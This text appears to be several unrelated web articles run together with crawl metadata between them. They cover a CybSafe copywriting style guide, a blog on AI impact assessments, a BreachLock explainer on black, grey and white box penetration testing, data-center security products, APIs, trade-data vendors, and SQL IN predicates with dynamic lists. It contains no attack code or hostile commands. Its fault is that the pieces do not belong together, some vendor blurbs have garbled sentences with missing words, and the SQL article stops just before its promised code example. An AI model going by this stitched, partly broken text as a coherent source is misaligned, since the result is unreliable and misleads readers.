As nice as it would be, CybSafe’s tone is not uniform. Context matters. Our tone varies depending on who we’re writing for, what we’re writing about and where we’re writing it. If this sounds odd, consider how you might talk to a child. Now consider how you might talk to your boss. The different audiences demand different tones. Now consider writing a tweet. Now consider writing a contract. CybSafe’s tone should and does vary. So choose your tone. That said, our personality is static. At CybSafe, we’re (amongst other things) human, positive, fun, bold and intelligent. Also, we don’t sit on the fence! We’re not afraid to say it like it is. Try sprinkling your copy with each as appropriate.
2.2 How to sound human
Write as you’d speak
In everyday conversation, humans favour simple language. We use the active voice. We avoid jargon. Read your copy aloud. If it sounds off, edit.
Use short sentences… but mix things up
Short sentences are easy to read. That’s why we use them. They’re recommended. But don’t go too far. You’ll sound robotic. When writing CybSafe copy, the occasional comma isn’t really a problem. And, actually, human conversations are full of “unnecessary” words. So favour short sentences. But mix things up. We don’t want to put our readers to sleep.
Avoid jargon… but write for your audience
Human conversation builds rapport. We want to do the same thing with our copy. We want to show our readers we know their world. Jargon can help make that happen. Don’t go overboard. But when writing for CISOs, the occasional reference to something like phishing is fine. Always consider your reader. CISOs know what phishing is.
Use the active voice… unless using the passive voice makes sense
Look at the following active sentence. Historically, CISOs have made some big security mistakes. The above sentence is active. To CISOs, it’s also offensive. In human speech, we’re courteous. We use the passive voice to lessen offence. Here’s the passive equivalent of the above. Historically, some big security mistakes have been made. The CISOs’ actions have been removed. We’re not pointing fingers at CISOs. We’re not blaming anyone. Need another example of a passive sentence that makes sense? Here you go: The CISOs’ actions have been removed. That’s a passive sentence. The active equivalent is “I’ve removed the CISOs’ actions.” It’s arrogant. It also presumes the reader knows who wrote this document. They might not. So the passive voice makes sense. Favour the active voice. But be human. Sometimes, the passive voice makes sense.
Avoid adverbs… but make your message clear
People use weak passwords. That’s a true statement. It’s also ambiguous. Do people use weak passwords all the time? Or do people only use weak passwords some of the time. People sometimes use weak passwords. This introduces an adverb (“sometimes”). But it clarifies things. You could argue “people favour weak passwords” is an adverb-less improvement. But is it? Do people really favour weak passwords? Probably not. Adverbs can clarify meaning. We use them in human speech. So there’s no blanket ban in CybSafe copy. This document includes adverbs throughout.
Replace “would not” with “wouldn’t”. Replace “she will” with “she’ll”. Replace “they are” with “they’re”. You’d do it when speaking. Do the same when writing. There’s one exception to this. If you’re using the same contraction twice in a short span, consider breaking things out, so you are not repeating contractions.
2.3 How to sound positive
Use positive language… but don’t go overboard
Great. Awesome. Incredible stuff. Used sparingly, positive words can create positivity. But when overused, they lose their power. When everything is awesome, awesome is average.
When people get excited, their tone changes. Their faces light up. They’re wide-eyed. You can convey this in copy with the exclamation mark. Great. Awesome! Incredible stuff. Again, take care here. We’re positive. But not intense. The odd exclamation mark is fine. But, when everything is exciting, exciting is average.
2.4 How to sound fun
When people get excited, their tone changes. And people get excited when delivering jokes. You can convey jokes in copy with the exclamation mark. The sentence “Trojans don’t harbour bloodthirsty Ancient Greeks.” conveys no emotion. It forces readers to deduce the joke. The sentence “Trojans don’t harbour bloodthirsty Ancient Greeks!” comes with a signal. The exclamation adds some fun.
Emojis clarify meaning. But, even better, research proves they make for more effective communication. 😃 The great news is you don’t even need to stick to faces. Objects do the same thing! 🎉 Use emojis to reinforce words. Not to replace them. Feel free to use them to make your copy fun. But be careful not to overuse them. One emoji every few paragraphs is about right. It probably goes without saying. Don’t use emojis in formal copy, like proposals and contracts. That would be inappropriate. 😬
Condensing messages implies they’re boring. Elaboration suggests the opposite. You can reiterate. You can give examples. In places, you can say the exact same thing more than once. Yes, the exact same thing… more than once! You’re having fun. So what’s the rush?
Filler is… er… Well, not many people use it to be perfectly honest! Filler is the little words. The unnecessary pauses. Think “um”, “er”, “ah” and “OK”. Use them. Because… well because they’re playful. Filler is fun.
CybSafe copy specifies for clarity. And because we’re fun. OK, the above paragraph is specific. But it could be more specific: CybSafe copy specifies for clarity. And because we’re a little bit fun. Notice the direction of specificity makes very little difference: CybSafe copy specifies for clarity. And because we’re really quite fun. The additional specificity is a form or elaboration. It elongates copy. Who cares? It’s fun!
Ditch the formalities. Not always. But, in places, feel free to loosen your tie. “Yes” can be “we get you”. “No” can be “Negative”.
Sigh. Moan. Groan. Nod. Yawn. Inhale. Gulp. Squirm. You won’t find expressions in formal copy. Fun copy, however, rarely holds back.
We know, we know. Conveying empathy isn’t easy. So try this simple trick: Go ahead and note what you think your reader is feeling. Then tell your reader you understand. Confused? That’s understandable! You might find adapting this paragraph helps.
Step outside of work mode. Passwords are hard to remember! Security is sometimes confusing! Don’t disagree with your reader. Charm them. Here’s a good example: “Have I been pwned?” is internet slang for “have I been owned?”… which is internet slang for “have I been defeated?”. So much slang! Well, security is cool… 😎
2.5 How to sound intelligent
Use simple words… but vary vocab
You can add varied vocabulary to your copy. Or you can weave it in. You can lace your copy. You can inject it. You can sprinkle your copy with varied vocab. You can pepper it. Or dust it. They’re simple words – but they’re unusual. They’re metaphorical. They paint pictures and add excitement. They make copy sound intelligent.
Use short sentences… but beware of fragments
“Fragmented” sentences are incomplete sentences. They either omit a subject or a verb. They’re often powerful. Just look at the fragmented sentences in the paragraph below (they’re italicised). The consequences of poor security can be extreme. Data loss. Theft. Even death. The fragmented sentences are cutting. But they’re also grammatically incorrect. Only use fragments knowingly. Inadvertent fragments undermine our intelligence.
Intelligent people guide others. They usher them along. How? Questions help. Questions let you posit answers. They also echo your reader’s thoughts. They keep your reader following along. Questions keep your copy engaging.
Take care with rhetoric
When you ask rhetorical questions, people can disagree. This undermines our intelligence. Here’s an example. Why not use rhetorical questions in your copy? There’s a good reason why not: they undermine our intelligence. When penning rhetorical questions, make sure there’s no room for disagreement.
Avoid ending sentences with prepositions
At. In. Of. To. At best, ending sentences with prepositions is informal. At worst, it’s dumb. Consider, Which journal was your article published in? You won’t see it much in writing. In which journal was your article published? is an intelligent alternative.
Use Hemingway… but overrule
Hemingway can be a bit like a game. It tells you what you need to fix. You fix it. You score a point. This makes it tempting to do everything Hemingway suggests. But remember: Hemingway is an algorithm. It has limitations. It knows what you’re doing. But it’s not sure why. It’s not sure why you’re using adverbs. It’s not sure why you’re using complex language. Don’t be scared to overrule Hemingway. Remember it’s an algorithm. Tone aside, the algorithm sometimes gets things wrong.
2.6 How to sound bold
Get to the point. Use one word instead of two. Make your meaning clear. I think we should probably do this. That’s indecisive. We should do this. That’s more like it.
That wouldn’t work. That would not work. “Wouldn’t” is casual. “Would not” carries gravitas. Replace the odd contraction to make a phrase sound bold.
Here’s an example: We can be bold even when opportunities are scarce. We can be bold even when opportunities are scarce. The italics signal emphasis. They’re the equivalent of leaning in and delivering a line with punch. When used correctly, emphasis ensures we sound bold.
Write in the present tense
Humans can prevent data breaches. Humans prevent data breaches. The former includes a caveat. There’s doubt in the sentence. The latter, present-tense sentence is assertive. It’s inarguable. It’s bold. Favour the present tense.
Heroes are bold. You can include them in your copy. CybSafe can be a hero. We reduce cyber risk. But that’s a little arrogant. If possible, our reader should be the hero. With CybSafe, you reduce your cyber risk. With CybSafe, you help your family.
This will often manifest itself in conclusions. It’s nurtured through rhythm. As you’re writing, picture great leaders and famous speeches. Tune into triumphant music playing in the background. Let it build. And build. Let it build even more. In your final few sentences, let the music blare. Say something visionary. Allow your syllables to rise! Then step back… Let things die down… Make your closing remark. Repeat the remark. It creates a visionary tone.
2.7 Avoid writing these things
Employees are people. They’re not inanimate, unthinking objects. Humanise. As opposed to referring to ‘employees’, refer to ‘people’. This makes our message clear.
Only two groups of people call their customers “users”. Security professionals and drug dealers. Try to humanise where you can: as above. 👌 Overall, use inclusive language. Respect diversity. Avoid words and terms that reflect stereotyped or prejudiced views of certain groups or people. Some words are okay to use in some context, but not in others. So be mindful! 🧠
People are the weakest link (actually, never write this!)
This reinforces a questionable school of thought: it implies people are a vulnerability to be patched. They’re not. People are a defence. Although it’s unreported, people prevent breaches. We want to highlight this. As opposed to declaring people a weak link, highlight their positive security role. People are our strongest defence.
People cause breaches
Criminals cause breaches. People prevent them.
(When referring to CybSafe) “Training”
CybSafe is not training. It’s a platform. It’s software. CybSafe manages human cyber risk.
2.8 Use sound judgement
As a parting note, the advice in this document is generic. In places, it’s conflicting. You might decide to go against it. If there’s a good reason to do so, go for it. Writing isn’t an exact science. So use your judgement. And have fun along the way.
Part 3: Bonus step: Read
The more you read, the better your writing will be. Reading CybSafe copy will show you what you’re aiming for. Read CybSafe course content. Read CybSafe marketing and internal communications, too. You don’t need to stop there. There are dozens of good copywriting resources available. Below are a few to start with.
Some good books on writing copy
- How to write better copy by Steve Harrison
- The copy book by D&AD
- Write to sell by Andy Maslen
- Scientific advertising by Claude Hopkins
- Common sense direct and digital marketing by Drayton Bird
- Tested advertising methods by John Caples
Some good books on writing in general
- On writing: A memoir of the craft by Stephen King
- Politics and the English language by George Orwell
- Into the woods: How stories work and why we tell them by John Yorke
- The reader’s brain by Yellowlees Douglas
- The elements of eloquence: How to turn the perfect English phrase by Mark Forsyth | <urn:uuid:249ad04c-b357-4dcc-a5e8-a0128951339b> | CC-MAIN-2022-40 | https://www.cybsafe.com/community/blog/how-to-write-like-cybsafe/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00294.warc.gz | en | 0.905329 | 4,317 | 2.59375 | 3 |
Zen and the Art of AI Impact Assessments
Have you ever walked into a room and forgotten what you were thinking or your purpose in going to that room? Don’t worry, this isn’t a sign of mental deficiency. It is a well-known side-effect of how human memory works. In psychology it is called the doorway effect.
There is a physical limit to the number of concurrent ideas humans can hold in our conscious thoughts. This limit on our working memory is low, only four independent ideas at once. Scientists believe that since it’s helpful for survival to prioritize thoughts and attention to what is happening around us, our brains have evolved to free up cognitive resources as we change locations, resetting our memories and thoughts as we walk through a door.
Compounding the doorway effect is cue-dependent forgetting, the failure to recall information without memory cues. When removed from our usual work environment to participate in an AI project, there is the risk that strategic business goals and everyday business rules will be forgotten.
It’s safe to say that most data science fails are inadvertent rather than malicious. A deep dive case study into several high profile AI failures revealed a common narrative: people meant well but they didn’t stop to think what could go wrong. Their lack of AI governance inevitably led to embarrassing failures.
Zen and AI Governance
Have you ever driven a car and realized that you don’t remember how you got to your destination? Sometimes we undertake a task without consciously thinking about it. On the other hand, the practice of zen seeks to enhance conscious observation and deliberate decision-making. The dictionary definition of zen is a state of meditative calm in which one uses direct, intuitive insights as a way of thinking and acting.
Have you ever peered into the cockpit of an aircraft when boarding your flight for your trip and seen the pilots sitting there holding a checklist? The purpose of these checklists is to avoid complacency and to ensure conscious observation of risk management.
AI governance should be proportionate to the risk. AI impact statements are not always necessary. But when there is material risk, it helps to list, then consciously investigate these risks.
The Need For Documentation
While AI projects may seem the domain of data scientists and IT professionals, research shows the vital role of business subject matter experts. In “Winning With AI” in the MIT Sloan Management Review, the authors report that when IT specialists lead AI projects they have half the success rate of projects where business line specialists lead AI projects. This isn’t a criticism of IT specialists, but rather a reminder that AI projects require a broader frame of reference than conventional IT projects, and AI projects are more about business transformation rather than technology.
But when business subject matter experts join an AI project, the experience can be much like stepping through a doorway into a different room. All too often when they leave behind their normal business routine, their cubicle or office, and surround themselves with data specialists talking unintelligible jargon, business subject matter experts are tempted to forget about the business imperative and let it play second fiddle to the technology.
Documenting the business goals, the business processes, and the stakeholders reinstates the memory cues, reminding the entire project team that the AI project is business focused.
Describing an AI System
Start with the why. Before you get into the details of how it will operate, start by documenting the purpose of the AI system. Describe the business goal and the metric used to measure business success. Business goals can include increasing sales, reducing errors, making a process more efficient or fairer, or removing frictions from customer experience. If there is more than one business goal, explain the hierarchy of those goals. Since nothing is perfect, define acceptable tolerances in system accuracy and business value achieved. Explain why the chosen solution will use AI rather than the alternatives, and how the AI system will help to achieve the business goals (i.e., what are the specific benefits expected from using AI versus alternatives).
Next, list the system constraints and the expected behaviors of the system. These will include regulatory requirements, business rules, common-sense heuristics, and ethical values. For example, regulatory rules could include not selling alcohol to minors, while a business rule or common-sense heuristic is that the price you charge for your products or services must not be negative. Relevant ethical values could include fairness or disclosure requirements.
AI requires data for training and for operation. Describe the provenance of the data, who owns the data, its quality, and relevance. An AI system is always part of a business process. Describe the revised business process that uses the AI system, the workflow, how the system will be used, and by who.
Finally, and most importantly, you need to list the people who will be stakeholders in the AI system’s operation and describe how the AI system will benefit them. This list will include, but is not limited to:
- The organization deploying the AI system
- Other end-users
- The natural environment
If you’re looking for inspiration for what attributes to document, here are a couple of standard lists for your reading list. Remember that every AI system is unique — use these lists for inspiration rather than as a compliance box-ticking exercise.
Risk management of complex systems often requires more structure and conscious consideration than simpler processes. By describing the business goals, rules, business processes, and stakeholders, you not only communicate a common understanding for all members of the project team, you also make it less likely that you will forget what’s most important and what can go wrong. | <urn:uuid:9eb8eef0-d5de-49db-b8bf-616543b2f228> | CC-MAIN-2022-40 | https://www.datarobot.com/blog/zen-and-the-art-of-ai-impact-assessments/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00294.warc.gz | en | 0.936253 | 1,182 | 2.53125 | 3 |
Have a Question About the BreachLock Cloud Platform? Enter it below.
13 April, 2022
Decode Black Box, Grey Box and White Box in PenTesting
Before we dive into answering this complex question, let’s first take a moment to understand what Penetration Testing is.
Penetration Testing, otherwise known as PenTesting, is a process for identifying the weaknesses in an organization’s digital environment intended to elevate security posture and build resilience against cyber-attacks. Traditionally, Penetration Testing is being conducted either manually using a consultant-based model or with automation using a software tool. However, in the era of digital business and the modern digital landscape, these methods do not scale and inhibit faster decision making. As a result, organizations are quickly revamping their methodology of conducting PenTest and adopting a combination of Human led A.I. based PenTesting. This combined approach gives the businesses the best of both worlds by leveraging human ingenuity to identify exploitable vulnerabilities and business logic otherwise invisible to the automated tools, to ensure comprehensiveness, scale, and faster time to value. The objective of Penetration Testing is to surface weak points or vulnerabilities within the digital landscape by simulating a cyber-attack before a cyber adversary even gets the chance to exploit said vulnerabilities.
So, what is the most common types of assets are being Tested?
Many organizations develop their web applications or websites using a global community of developers, meaning that there are externally hired developers involved in the development of their web applications. Whether or not an organization’s web application was developed by full-time employees or by a contractor, there is always risk involved when it comes to cybersecurity. Modern applications are not developed but are assembled by using open source and commercial components to reduce the to go-to-market time.
These vulnerabilities in web applications arise because of 2 primary reasons:
- Lack of security testing during the Software Development lifecycle (SDLC)
- New vulnerabilities are being discovered in the open source or commercial components used in the application.
The recent example of Spring Framework RCE vulnerability, CVE-2022-22965, The Spring Framework (Spring) is an open-source application framework that provides infrastructure support for developing Java applications.
Another example is, according to OWASP (Open Web Application Security Project), 94% of web applications tested reported some variation of broken access control, meaning that users of lower privilege had a way to access higher privilege information that they shouldn’t have access to. This could cause major issues for an organization that handles sensitive information like health records and financial details. It is always a smart decision to have your web application tested for data leaks, authentication failures, failed access controls, and things of that nature that could have resulted from any coding or design flaw or maintenance.
Whether organizations are born in a cloud, traditional, or hybrid environment to manage and enable their business, network Penetration Tests help discover exploitable vulnerabilities and put them through the process of remediation within a network whether it be in a workstation, server, or another device. External network Penetration Tests help paint a picture of the attackers’ view (outside-in) and involve perimeter examination to ensure that there are no access points between the external and internal network that should not be there. Internal and external network Penetration Tests are often performed in tandem with one another.
Modern-day businesses require modern-day solutions, which is why many organizations utilize iOS and Android mobile applications to communicate with and serve their employees’ and customers’ needs. Similar to a web application, it is important to identify and remediate exploitable vulnerabilities within a mobile application before attackers do. In a mobile application Penetration Test, it is common to test for any authentication, data leakage, and authorization issues.
APIs If the security of an API endpoint has a vulnerability detected within it, a cyber adversary can take advantage of the said vulnerability to access sensitive data stored in an organization’s application.
Now that we understand what assets are commonly being tested during Penetration Tests, what is the difference between conducting Whitebox Penetration Tests, BlackBox Penetration Tests, and gray box Penetration Tests?
An organization that is looking at starting its PenTesting journey should follow this approach from the beginning:
- Black Box testing for an attackers’ view to cover a broader scope
- Grey Box testing for an insider view with minimal access
- White Box testing for a much deeper inside view
It will be an exercise in futility if an organization conducts Black, Grey, and White box testing one-by-one, it will be an exercise in futility. Remediating the vulnerabilities identified at each stage, it will overwhelm the system and make the remediation process more difficult than necessary in the long run.
Black Box Penetration Test
Blackbox Penetration tests are the closest thing to simulating a real-life attack on a digital asset, as the ethical hacker is given absolutely no information or credentials to access any part of the asset being tested. For example, in a Blackbox test being conducted on a web application, a PenTester would attempt to access privileged information or controls within the application as if they were a real cybercriminal. If they had any success, that would mean that there were vulnerabilities detected within the asset, which would mean that the web application is not secure, especially because the hacker was not given any information to do so effectively.
White Box Penetration Test (All details & credentials are available to PenTesters)
White box testing helps identify vulnerabilities from an insider’s view. In the case of an attacker gaining initial hold of the system or application of a company insider, white box Penetration Testing can reveal the types of vulnerabilities that could be exploited in that event as well as the impact it could cause. White box PenTesting requires a client to share details such as asset information and credentials with their Penetration Tester. While White box Penetration Testing is nowhere near close to a real-world cyber-attack, it is still a cost-effective and time-saving method of conducting a Penetration Test.
In the case of web applications, the Penetration Testing scope would also include code-review to identify the vulnerabilities arising from the coding practices used.
Gray Box Penetration Test
In a gray box Penetration test, a limited amount of information is given to the PenTesters conducting the PenTest. Gray box Penetration testing allows for an “inside and out” Penetration Testing approach, giving the PenTesters the opportunity to test every side of an application, which is much of the reason why it’s the most common. In many cases, PenTesters are given login credentials to either a network or application to test the access privileges between distinct levels of users within an asset.
For example, a web application in the healthcare industry could involve a login portal for doctors and patients – it would be an extreme breach of privacy for patients to be able to access confidential data about other patients that should only be available to doctors. Gray box Penetration Testing ensures that there are no vulnerabilities that would allow that to happen.
It is worth noting that the main difference-maker between each type of Penetration Test is in the amount of information being given to the Penetration Tester by an organization. Since there are so many variables when it comes to choosing the right Penetration Test based on scope, budget, timeframe, and more, it is imperative that your Penetration Testing vendor has expertise in all areas.
BreachLock has extensive experience in all areas of Penetration Testing discussed, but it also has certifications across many key areas such as ISO 27001, CREST, OSCP, OSCE, and more. There are many great options out there, but doing your due diligence with research before engaging with a vendor will ensure that your organization is in good hands, and you achieve the desired objective of the PenTesting engagementBack To Other Posts | <urn:uuid:a57d482f-b629-4b2d-9c5c-22838e29b7d6> | CC-MAIN-2022-40 | https://www.breachlock.com/decode-black-box-grey-box-and-white-box-in-pentesting/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00294.warc.gz | en | 0.933281 | 1,640 | 2.671875 | 3 |
For most companies, cyber security has always been about keeping criminals out of their data centers with the best firewalls money could afford. Firewalls are great, they can keep most of the criminals out, but not all of them. It’s only a matter of time until a hacker is able to figure out how to get past the most recent firewall update. Then it turns into a game of cat-and-mouse, as the IT team struggles to update their firewalls, and the criminals find new ways to sneak through them.
The problem with this model is, once a criminal is able to get past those defenses, there usually aren’t many security measures blocking them from moving around the network completely undetected.
In order to remain undetected, hackers use “east-west” traffic, or server-to-server traffic within the data center. Hackers have learned not to leave the data center to access another network or anything outside the data center. Instead, they are able to stay within the system for months on end, simply by avoiding the main security measures. During that time, they can be gathering important information or creating millions of other problems.
These east-west paths were created to lower latency in the data center, and because it would be difficult to prevent threats with firewalls alone. So, most companies have not implemented many blocks for east-west traffic, instead, they have focused all their efforts on the “north-south” traffic, through the gateway.
Protecting data centers with firewalls, without trying to detect the criminals who sneak inside, means that most companies don’t even know their network has been hacked until the hackers are long gone and their data had already been comprised.
A recent report by CIO found that half of the professionals say that the loss of data is their top IT security risk. That’s because the average data breach in 2015 cost a company $3.79 million dollars, which translates to a loss of around $500 billion dollars around the world annually. By 2019, the cost is predicted quadruple to $2.1 trillion globally.
As businesses rely on their data centers to store more and more of their valuable information, there will be greater and greater threats to those data centers, and thus, a need for newer and smarter security methods to stop them. Here are three examples of new security measures that data centers are taking to detect attackers and prevent them from attacking in the first place.
Focus on the Threats with Cisco’s FIREPOWER
The Cisco Firepower won this year’s Interpop security award with their next generation firewall (NGFW), which claims to be the industry’s first ‘threat-focused’ NGFW.
The firewall is able to detect threats by understanding how normal users are connecting to applications, and comparing that information with threat intelligence. The threat detection allows businesses to identify and stop threats before they become any more serious.
David Goeckeler, senior vice president and general manager at Security Business Group, Cisco explains that the Firepower allows for “better protection, and faster detection and response to advanced threats. [It] will help our customers build a dynamic, resilient secure infrastructure to combat threats in real-time”
In addition, the NGFW is able to unify the management of all firewall functions, from application control to threat prevention and malware protection throughout a management console, making it a lot easier to manage your firewalls across the network.
Analyze your data center’s weaknesses with ASAP
This year, the Cyber Defense Magazine InfoSec awards named Illumio’s “Attack Surface Assessment Program,” (ASAP) the most innovative data center security solution of 2016. ASAP is an advanced algorithm that generates a map of all your data center activity and identifies all of the active and inactive pathways.
Nathaniel Gleicher, the former Director for cyber security policy at the White House, developed the program for Illumio. He says it allows users to analyze the traffic in their network, their applications, their environments, their servers, and how each of the separate parts communicate with each other.
In their two-step program, Illumio gives a business a simple script to run, which generates a roadmap of all the data center activity. Then, Illumio analyzes the data, and presents the business with a detailed report on all the weak points within the network, identifying the most likely areas an attacker could infiltrate. ASAP gives businesses the power to understand their network and the best places to defend against an upcoming attack.
Nathaniel Gleicher explains, “One of the challenges is that the attack surface can be so vast. If you try to secure everything equally, you often end up not securing everything enough,” Gleicher said. “You need to prioritize security around your most valuable information.”
In addition, ASAP can also detect where a malicious signal is coming from, and quickly allow the IT team to isolate and quarantine the server the connection is coming from. This would allow a business to stop a cyber-attack in progress, and provide the business with a lot more information about the paths that cybercriminals are utilizing, making it much easier to stop a future attack from the same paths.
Trust No One with VMware NSX & Micro-segmentation
Traditionally, businesses have segmented their networks with physical firewalls and routers, which were able to control traffic between web tiers, application tiers, database tiers, and the internet. But, all these firewalls made life difficult for IT teams. It was time-consuming and confusing to implement even small changes across a large network, and, in the end, they didn’t do a very good job of stopping breaches in the first place.
With the advent of software-defined data centers (SDDCs), companies were finally able to write software that catered to the needs of their business. Not only can micro-segmentation detect threats from anywhere within the data center, it can also create and change security policies automatically, all while matching the speed and complexity of the workloads they are protecting.
Micro-segmentation can give a zero-trust level to every individual workload, which means cyber criminals can no longer piggyback on legitimate users, or hide in the dark corners of your data center.
As it is described in the White Paper, Micro-Segmentation Builds Security into Your Data Center’s DNA, “physical security (with firewalls and routers) is like using gloves to guard against germs. It is external, limited protection (if someone sneezes in your face, you’re probably going to end up with a cold or flu). Micro-segmentation is like fortifying the immune system of the data center: germs (or malware) can’t get it.”
In addition to protecting the information on data centers, Micro‐segmentation also enables companies to use the security measures of the SDDC on their desktop computers and mobile environments alike.
Firewalls have their problems, but they are not going away anytime soon. However, future businesses are not going to rely solely on their walls to protect them from outside invaders. They can now keep a few guards inside of the walls to protect them in case an attacker ever gets inside. | <urn:uuid:6ed3c27f-c93a-4404-b194-58cf6ab3e579> | CC-MAIN-2022-40 | https://www.colocationamerica.com/blog/data-center-security-more-about-detection | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00494.warc.gz | en | 0.952979 | 1,526 | 2.546875 | 3 |
An Application Programming Interface (API) is a set of definitions and protocols for building and integrating application software. APIs let your product communicate with other products and services without having to know how they’re implemented. This simplifies app development, saving time and money. When designing new tools and products, or managing existing ones, APIs give you flexibility, simplify design, administration, and use.
Some well known APIs include Google Maps, Amazon, and YouTube. These APIs allow web designers to integrate and embed products into their website. For example, the web designer may want to show the customers where their office is located; they can embed Google Maps to show their location on a Google Map embedded in their own website. YouTube APIs are one of the most common APIs, allowing designers to embed any video from YouTube on their website. APIs essentially allow organizations to keep their own branding while also using another service or product more capable of a certain task.
Additional Reading: OWASP Top Ten
What does this mean for an SMB Owner?
Knowledge is power seems appropriate when it comes to API visibility. Application developers and users need to know which APIs are being published, how and when they are updated, who is accessing them, and how are they being accessed. Understanding the scope of one’s API usage is the first step toward securing them.
API access must be controlled or else it may lead to inappropriate exposure. Ensuring that the correct set of users/applications have appropriate access permissions for each API is a critical security requirement that must be coordinated with identity and access management (IAM) systems.
In some environments, as much as 90% of the respective application traffic (account login/registration, shopping cart checkout) is generated by automated bots. Understanding and managing traffic profiles, including differentiating good bots from bad ones, is necessary to prevent automated attacks without blocking legitimate traffic. Effective complementary measures include implementing whitelist, blacklist, rate-limiting policies, CAPTCHA, as well as geofencing specific to use-cases and corresponding API endpoints.
Vulnerability exploit prevention
APIs simplify attack processes by eliminating the web form or the mobile app, allowing a bad actor to more easily exploit a targeted vulnerability. Protecting API endpoints from business logic abuse and other vulnerability exploits is a key API security mitigation requirement.
Data loss prevention
Preventing data loss over exposed APIs for appropriately privileged users or otherwise, either due to programming errors or security control gaps, is also a critical security requirement. Many API attacks are designed specifically to gain access to critical data made available from back-end servers and systems.
It’s important to stay up to date with the tools and software your business uses. Ensure you are made aware of new vulnerabilities within your API -based infrastructure and services. Subscribing to a cybersecurity Newsletter can help you stay on top of these emerging security threats. Check out CyberHoot’s Newsletters and sign up for free monthly updates. Being aware of the security threats you face is the first step in securing your systems. | <urn:uuid:48963dd7-df27-4889-9627-f48083f3c4ec> | CC-MAIN-2022-40 | https://cyberhoot.com/cybrary/application-programming-interface-api/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00494.warc.gz | en | 0.931198 | 637 | 3.3125 | 3 |
Trade data refers to all data on domestic or international trade. This is by country, region, industry, direction of flow (imports vs exports), and trade agreements partners.
Most of this data comes from governmental or international organizations such as customs agencies and EU monitors. These organizations also compile data from the reports of private companies or supply chain points, such as ports.
This data is commonly reported in columns that include monetary transactions per industry, country, and direction (imports vs exports). Tariffs and other laws and regulations affecting transactions are also very common measurements.
You will encounter industry classification codes such as the NAICS (North American Industry Classification System), or the SIC (Standard Industrial Classification) systems. If you focus on imported and exported commodities, you will instead encounter the HTS (Harmonized Tariff System) codes.
Commercial businesses, banks, investors, law firms, manufacturers, public policy makers, trade association members, and more all rely on trade data. Businesses and manufacturers use it to determine which products to create, where to market them, and how much to price them. Banks use it to find reliable borrowers while investors use it to find good investments. Law firms, international organizations, governments, and policy makers use the data to monitor local and foreign markets and to make sure that no party is being taken advantage of.
You should feel secure in using trade data from most sources: Governments and international agencies depend on accurate data to function while private companies that submit their data to governments have the strongest incentive to be as accurate as possible. Generally speaking, the difficulty lies in the size of the data.
In essence, reporting on price by volume or weight across borders, taking into account changing taxes and transportation difficulties (and, lately, coronavirus shutdowns), results in massive amounts of data even for small companies. Larger companies, or any company with international or widespread shipping or supply chains, compound that data at every pressure point. Then, depending on the size of the operations monitored, you may receive updates every hour. Thus, it is crucial for you to collect all relevant and accurate data and make sure it is constantly updated and cleaned. There are many data vendors for review on our site that provide real-time data updates and dataset cleansing for your enterprise. We recommend checking the services of the vendors linked to this page.
The growth in world trade fell to only 1% last year, a decline from 4% in 2018 and 6% in 2017. That’s the fourth worst progression in the last 40 years. That should be no surprise. The U.S. and China are the world’s two great national consumer markets. With over $4 trillion a year in combined imports, they are juicy targets for companies around the world. As they’ve started saying no to each other with higher tariffs, that’s opened doors for companies in other countries to flood their markets with lower prices.
Trading Volatility’s dataset – ‘Dark Pool buying measurement of US companies and indexes – tickerized’ provides Economic Data, Legal and IP Data and Trade Data that can be used in and Portfolio Management
Topstonks’s dataset – ‘TopStonks: Social Buzz and Sentiment Data from the Most Popular Crypto Forums’ provides Stock & Market Data, Trade Data and that can be used in Algo-Trading, and Portfolio Management
Risklio’s dataset – ‘Risklio Event-Aware Trading Insights | US Stock Sentiment & Equity Market Insights’ provides Economic Data, , Stock & Market Data and Trade Data that can be used in Algo-Trading, Portfolio Management, Supplier Risk and Hedge Fund Management | <urn:uuid:5f6dce39-558d-4fbe-8ced-1f0ef51ea303> | CC-MAIN-2022-40 | https://www.data-hunters.com/category/retail_data_and_commerce_data/trade-data/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00494.warc.gz | en | 0.922337 | 766 | 2.53125 | 3 |
SQL Record Selection with Dynamic Lists
September 28, 2005 Ted Holt
SQL’s IN predicate provides an easily understood, practical way to select records (rows) of a database file (table) by comparing a field’s (column’s) value to a list of predetermined values. However, when using IN with a dynamic list, i.e., a list whose values and number of values are not specified until run time, IN has a drawback, namely that the programmer must allow for the number of values in the list in advance. This article will give you three ways to deal with dynamic lists.
But first, a brief review of the IN predicate is in order. One way to use IN is to specify a list of hard-coded literals. The following SQL query selects data for anyone whose last names are Jones, Doe, or Vine.
select cusnum,lstnam,init,city,state from qiws/qcustcdt where upper(lstnam) in ('JONES','DOE','VINE')
The query returns these rows.
CUSNUM LSTNAM INIT CITY STATE 839,283 Jones B D Clay NY 392,859 Vine S S Broton VT 475,938 Doe J W Sutter CA
A second form of IN uses a subquery to generate the list.
select cusnum,lstnam,init,city,state from qiws/qcustcdt where upper(lstnam) in (select name from qtemp/select)
The SQL processor reads the SELECT table in library QTEMP and builds a list from the values in the NAME column.
Let’s return to ways to deal with dynamic lists. Suppose you wish to allow the user to key one or more values of some type at run time. The user might key one, two, or a dozen values, and the keyed values are used to select records from a database file. It would be nice to place a varying number of host variables in a program, but each value requires its own host variable. The following embedded SQL command allows for 12 selection values.
C/exec sql C+ declare Input cursor for C+ select x.* from qcustcdt as x C+ where upper(lstnam) in C+ (:Nam01, :Nam02, :Nam03, :Nam04, C+ :Nam05, :Nam06, :Nam07, :Nam08, C+ :Nam09, :Nam10, :Nam11, :Nam12) C/end-exec
If it becomes necessary to allow for more values, more host variables must be added. If the user wishes to search for fewer than 12 names, the values in the unused host variables must not cause the search to return erroneous results. So, how can you deal with dynamic lists?
One method is to allow for a maximum number of host variables and fill the unused ones with a value that is unlikely to be stored in the database. Since a customer is unlikely to have the name !@#$%, for example, you might fill unused list elements with such a value, as in the following RPG program fragment, in which the user has entered 10 customer names.
